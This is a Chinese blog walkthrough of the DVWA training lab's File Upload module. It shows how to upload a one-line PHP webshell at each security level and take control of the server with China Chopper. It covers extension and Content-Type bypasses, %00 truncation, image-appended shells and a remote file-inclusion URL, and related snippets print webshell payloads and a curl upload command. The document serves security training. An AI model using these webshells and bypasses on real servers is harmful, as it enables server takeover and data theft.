DVWA通过教程之文件上传File Upload

最新推荐文章于 2025-02-13 12:27:07 发布
最新推荐文章于 2025-02-13 12:27:07 发布
阅读量3.7k 收藏 29
点赞数 4
分类专栏: Web安全之授权类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/108685931
版权

文件上传漏洞原理可参考:浅谈“文件上传漏洞”

测试File Upload,要求能够上传一个一句话木马文件,一名话木马文件的文件名为zhangsan,连接参数为zs,并使用“中国菜刀”工具进行连接,遍历网站目录。

Low

服务器端核心代码

分析:

basename(path,suffix) 

函数返回路径中的文件名部分,如果可选参数suffix为空,则返回的文件名包含后缀名,反之不包含后缀名。

可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。

漏洞利用

文件上传漏洞的利用是有限制条件的,首先当然是要能够成功上传木马文件,其次上传文件必须能够被执行,最后就是上传文件的路径必须可知。不幸的是,这里三个条件全都满足。

上传文件123.php(一句话木马)

上传成功,并且返回了上传路径

打开中国菜刀,右键添加,

地址栏填入上传文件所在路径http://192.168.33.1/dvwa/hackable/uploads/123.php

参数名(一句话木马口令)为liu。

然后菜刀就会通过向服务器发送包含liu参数的post请求,在服务器上执行任意命令,获取webshell权限。

可以下载、修改服务器的所有文件。

Medium

服务器端核心代码

分析:

可以看到,Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。

漏洞利用:

1.更改文件名后缀

这里采用的是一句话木马,所以文件大小不会有问题,至于文件类型的检查,尝试修改文件名为123.png。

上传成功。

启用中国菜刀。

http://192.168.33.1/dvwa/hackable/uploads/123.png

不幸的是,虽然成功上传了文件,但是并不能成功获取webshell权限,在菜刀上无论进行什么操作都会返回如下信息.

中国菜刀的原理是向上传文件发送包含liu参数的post请求,通过控制liu参数来执行不同的命令,而这里服务器将木马文件解析成了图片文件,因此向其发送post请求时,服务器只会返回这个“图片”文件,并不会执行相应命令。

所以我们可以抓包修改文件名:

可以看到文件类型为image/png,尝试修改filename为123.php

上传成功。

上菜刀,获取webshell权限。

http://192.168.33.1/dvwa/hackable/uploads/123.php

2.更改文件content-type

就是上传123.php文件,然后修改content-typeimage/png,过程同上类似。

3.%00截断

在php版本小于5.3.4的服务器中,当Magic_quote_gpc选项为off时,可以在文件名中使用%00截断。

可选方法举例如下:

  1. 更改文件后缀为123.php.jpg,设置代理并上传。抓包并将php.jpg中的字符“.”(十六进制0x2e)更改为00。
  2. 更改文件后缀为123.php.jpg,设置代理并上传。抓包并在php.jpg中的字符“.”(十六进制0x2e)前右键选择insert byte,增加一个0x00字节。
  3. 更改文件后缀为123.php%00.jpg,设置代理并上传。抓包并选中%00,右键url-decode。

4.组合拳(文件包含+文件上传)

上传123.png

如何让服务器将其解析为php文件呢?我们想到文件包含漏洞(详见文件包含漏洞教程)。

这里可以借助Medium级别的文件包含漏洞来获取webshell权限,打开中国菜刀,右键添加,在地址栏中输入

http://192.168.33.1/dvwa/vulnerabilities/fi/?page=?page=htthttp://p://192.168.33.2/dvwa/hackable/uploads/123.png

点击添加,输入参数liu

成功获取webshell权限。

 

High

服务器端核心代码

分析:

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

getimagesize(string filename)

函数会通过读取文件头,返回图片的长、宽等信息,如果没有相关的图片文件头,函数会报错。

可以看到,High级别的代码读取文件名中最后一个”.”后的字符串,期望通过文件名来限制文件类型,因此要求上传文件名形式必须是”*.jpg”、”*.jpeg” 、”*.png”之一。同时,getimagesize函数更是限制了上传文件的文件头必须为图像类型。

漏洞利用:

采用%00截断的方法可以轻松绕过文件名的检查,但是需要将上传文件的文件头伪装成图片由于实验环境的php版本原因,这里只演示如何借助High级别的文件包含漏洞来完成攻击。

首先利用copy将一句话木马文件123.php与图片文件1.jpg合并成hack.jpg

生成的文件hack.jpg

打开可以看到,一句话木马藏到了最后。

顺利通过文件头检查,可以成功上传。

上菜刀,右键添加shell,地址栏填入

http://192.168.33.1/dvwa/vulnerabilities/fi/?page=file:///C:/phpStudy/WWW/dvwa/hackable/uploads/hack.jpg

在菜刀之前先用浏览器访问该地址进行解析,不解析php代码将不会被执行(注意!!!)

参数名填liu,

脚本语言选择php。

成功拿到webshell。

Impossible

服务端核心源代码:

分析:

1.上传文件进行重命名(md5值,导致%00截断无法绕过过滤规则)。

2.加入Anti-CSRF token防护CSRF攻击

3.对文件的内容进行严格的检查,让攻击者无法上传含有恶意脚本的文件。

 

DVWA通关--文件上传(File Upload)
箭雨镜屋
01-03 6589
LOW 通关路径 <?php assert($_POST['dvwa']);?> 源码分析 MEDIUM 通关路径 源码分析 HIGH 通关路径 sh.php和sh.jpeg都是返回这个 源码分析 IMPOSSIBLE 源码分析
DVWA-File Upload文件上传
mlws1900的博客
03-16 1113
黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA-File Upload(文件上传)
简简的博客
02-02 556
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA第五关:文件上传漏洞(File upload)
最新发布
weixin_55270891的博客
02-13 1028
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。这里三个条件全都满足。可以看到,服务器对上传文件的类型、内容没有做任何的检查、过滤,存在明显的文件上传漏洞,生成上传路径后,服务器会检查是否上传成功并返回相应提示信息。这里的代码没有对上传的文件做任何的检测和过滤,所以可以直接上传一句话木马。
新手指南:DVWA-1.9全级别教程File Upload
weixin_50464560的博客
03-19 493
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。 DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是
DVWA文件上传
giun的博客
03-09 1389
一、尝试low等级 我们上传一个phpinfo.php文件,文件内容为&amp;lt;?php echo pphpinfo()?&amp;gt;, 把路径拼接起来,输入 http://localhost/DVWA/hackable/uploads/phpinfo.php 成功获得执行我们上次的文件 我们再上传个一句话木马文件 然后直接尝试系统命令 http://localhost/DVWA/hackabl...
DVWA文件上传漏洞(File Upload
qq_54537919的博客
06-27 670
DVWA文件上传漏洞(File Upload
DVWA -File Upload-通关教程-完结
刘箫-技术库
04-07 2439
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWA File Upload 文件上传漏洞
Lee_yc的博客
09-20 1180
1、查看源代码,发现对上传的文件类型做了严格的过滤,只能上传图片,正常上传php文件会报错。2、利用文件包含漏洞,用图片包含一句或木马,将图片拖入edjpgcom这个软件。6、使用antsword连接,连接成功,getshell。5、访问文件,没有反应,也没有报错,说明木马上传成功。1、查看源码,发现对文件上传的类型没有任何限制。3、上传成功,访问一下没有报错说明小马已成功。4、使用antSword连一下,连接成功。6、用antSword连接,成功。5、访问上传文件,出现乱码。4、放包,发现上传成功。
DVWA 实验报告:5、文件上传 File Upload
看那白熊
05-16 1753
dvwa 文件上传漏洞复现
DVWA靶场-----FIle Upload文件上传
m0_65712192的博客
11-14 4379
DVWA靶场-----FIle Upload文件上传
5、DVWA——文件上传
qq_55202378的博客
09-11 1438
DVWA 文件上传
DVWA通关之File Upload
ZJLE的博客
08-06 268
DVWA通关之File UploadLow:Medium:High: 文件上传 File Upload,通常是由于对上传文件的类型,内容没有进行严格的过滤,检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传带来的危害常常是毁灭性的,Apache,Tomcat,Nginx等都爆出过文件上传漏洞。 利用文件上传,我们可以上传我们的一句话木马,很方便的会获得系统shell。 Low: 源码分析一下: <?php if( isset( $_POST[ 'Upload' ] ) )
DVWA系列——File Upload文件上传
weixin_49340699的博客
12-12 1210
DVWA系列——File Upload文件上传)简介low级别源码分析上传木马打开中国菜刀进行连接medium源码分析破解思路high源码分析破解思路方法一方法二impossible 简介 File Upload文件上传漏洞,通常是由于对上传文件的类型内容没有进行严格的过滤检查使得可以上传webshell获取服务器权限,所以文件上传漏洞带来的危害也是毁灭性的。 low级别 源码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are
DVWA 文件上传
m0_56107268的博客
04-30 2142
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
DVWA篇_文件上传
05-25 1917
记一次DVWA文件上传漏洞复现
DVWA】Web漏洞实战之File Upload
03-11 204
File Upload File Upload,即文件上传漏洞,一般的上传漏洞可能是未验证上传后缀 或者是验证上传后缀被bypass 或者是上传的文件验证了上传后缀但是文件名不重命名。 LOW 直接上传任意文件 MEDIUM 验证Content-Type,修改Content-Type为image/jpeg直接绕过 HIGH 验证了后缀名、文件...
DVWA通关攻略之文件上传
勿山几已
05-22 3546
简要介绍文件上传漏洞及其利用
【渗透测试-web安全】DVWA-文件上传
harry_c的博客
11-13 642
【渗透测试-web安全】DVWA-文件上传实操进阶 实操 服务器使用upload(“hello.jpg”),实现文件上传。而我们则是利用hello.jpg的参数构造进行漏洞攻击 首先登录系统,选择Low等级进行实战 上传文件: 显示:…/…/hackable/uploads/崽崽.jpg succesfully uploaded! 由http://localhost/dvwa/vulnerabi...
dvwa靶场通关教程文件上传
01-04
### DVWA 文件上传功能详细教程 #### 了解文件上传漏洞原理 文件上传漏洞允许攻击者向服务器上传恶意文件,通常是一句话木马。一旦成功上传并执行这些文件,攻击者就能获得对网站目录甚至整个系统的控制权限[^2]。 #### 准备工作 为了进行DVWA中的文件上传实验,需先完成如下准备工作: - **安装配置DVWA环境**:按照相关指南,在Windows环境下使用phpStudy搭建DVWA站点[^4]。 - **启动Kali Linux平台**:作为渗透测试的操作系统,确保已正确安装并能正常运行。 - **设置Burp Suite代理**:用于拦截和修改HTTP请求数据包,以便于分析和操控文件上传过程[^3]。 #### 开始文件上传挑战 进入DVWA主页后选择`File Upload`选项卡开始练习: 1. 页面显示了一个简单的表单,其中包含两个输入框——一个是供用户选择要上传的文件;另一个则是指定目标存储位置(此字段可能被隐藏或禁用)。 2. 默认情况下,该模块的安全级别设为低级(low),这意味着几乎没有任何防护措施阻止非法文件类型的提交。 3. 尝试上传一个普通的图片文件(如.jpg),观察其行为表现,并注意查看返回的消息提示以及确认文件确实保存到了预期路径下。 #### 提升难度至中级(medium) 当把安全等级调整到medium时,程序会对所选文件进行了初步验证,只接受特定扩展名结尾的照片类文档(.jpg,.png等)。此时可尝试以下方法绕过检测机制: - 更改待传对象的真实MIME类型; - 修改客户端脚本逻辑以欺骗服务端判断依据; 值得注意的是上述两种方式均违反道德准则和技术伦理,请仅限学习研究目的内实践! #### 高级(high)模式下的对抗技巧 在最高级别的保护状态下,除了延续之前的过滤规则外还增加了基于内容特征码黑名单匹配算法。面对这种情况建议采用更隐蔽的技术手段比如但不限于: - 利用PHP特性构造特殊格式的一句话WebShell; - 结合其他漏洞组合拳出击实现最终突破效果; 不过出于合法合规考虑这里不再展开具体细节描述。 ```bash # 使用curl命令模拟POST请求发送带payload的数据流给远程web应用接口 $ curl -F "uploaded=<;php eval($_POST['cmd']);?>" http://target.com/dvwa/hackable/uploads/ ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值